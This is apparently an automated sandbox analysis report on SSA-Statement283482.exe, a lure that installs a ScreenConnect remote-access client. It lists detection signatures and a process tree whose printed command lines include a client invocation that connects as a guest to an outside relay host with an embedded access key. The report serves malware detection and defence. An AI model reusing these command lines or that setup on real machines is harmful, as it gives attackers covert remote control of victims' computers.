Edit tour
Windows
Analysis Report
SSA-Statement283482.exe
Overview
General Information
Detection
ScreenConnect Tool
Score: | 63 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Compliance
Score: | 32 |
Range: | 0 - 100 |
Signatures
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Enables network access during safeboot for specific services
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool
Classification
- System is w10x64
- SSA-Statement283482.exe (PID: 8 cmdline:
"C:\Users\ user\Deskt op\SSA-Sta tement2834 82.exe" MD5: 3947493098FA9F8AD99838B31B1718CA) - msiexec.exe (PID: 5448 cmdline:
"C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\AppData\ Local\Temp \ScreenCon nect\8139d 6693ff1137 7\setup.ms i" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- msiexec.exe (PID: 6696 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 5868 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng FA703DB E50430AA3A E223680D26 C73B8 C MD5: 9D09DC1EDA745A5F87553048E57620CF) - rundll32.exe (PID: 6672 cmdline:
rundll32.e xe "C:\Use rs\user\Ap pData\Loca l\Temp\MSI 99FE.tmp", zzzzInvoke ManagedCus tomActionO utOfProc S fxCA_39061 40 1 Scree nConnect.I nstallerAc tions!Scre enConnect. ClientInst allerActio ns.FixupSe rviceArgum ents MD5: 889B99C52A60DD49227C5E485A016679) - msiexec.exe (PID: 1516 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng F47F013 5428421DD6 AA24B08E4A BF26D MD5: 9D09DC1EDA745A5F87553048E57620CF) - msiexec.exe (PID: 6976 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng B204C9D 5325E23864 8AF623869E 5D724 E Gl obal\MSI00 00 MD5: 9D09DC1EDA745A5F87553048E57620CF)
- ScreenConnect.ClientService.exe (PID: 7204 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (8139 d6693ff113 77)\Screen Connect.Cl ientServic e.exe" "?e =Access&y= Guest&h=in stance-uil 9h2-relay. screenconn ect.com&p= 443&s=194a ab28-7c37- 4c31-9453- 095c849fe3 ac&k=BgIAA ACkAABSU0E xAAgAAAEAA QBtiFOcCyZ yZIYMRa7q% 2fxlupwY5p sgwtIrmaNt AqcPOS3wxM 8KzGEILcWi AQrulPKqVk 7Rqd6bB%2f HZh%2fmnGS w2CAH4apde V45uG24aPv 2cHFtSJ6Rs hGlIAVmQDp gDTZGV70NO KRVbQf4oTZ hjBjedMNc4 eQan%2fjh9 itC%2bqr9s xraG6l1Z%2 boKOxbfHBJ 6Wfpk7eUPM 6olxgYqoAm aN4Rv%2bfd TlaueMe6P2 zoVUESpDoH b1G6UbMs3F mBJCA%2f9A Zwydk%2f14 3G89rCDbAy abHRD4c4l% 2fHfxv8RMf l8ImXlPMvn bcvlou8OpE AIEdGjx8c% 2bAEWMGqks gH4Y5DFBuR 2ZkLk&c=Qu adChomes&c =QuadChome s.com&c=&c =Host&c=&c =&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447) - ScreenConnect.WindowsClient.exe (PID: 7280 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (8139 d6693ff113 77)\Screen Connect.Wi ndowsClien t.exe" "Ru nRole" "78 4d1de5-465 a-4b33-b06 c-f62c0041 2c92" "Use r" MD5: 20AB8141D958A58AADE5E78671A719BF)
- svchost.exe (PID: 7416 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
Click to see the 3 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
Click to see the 3 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |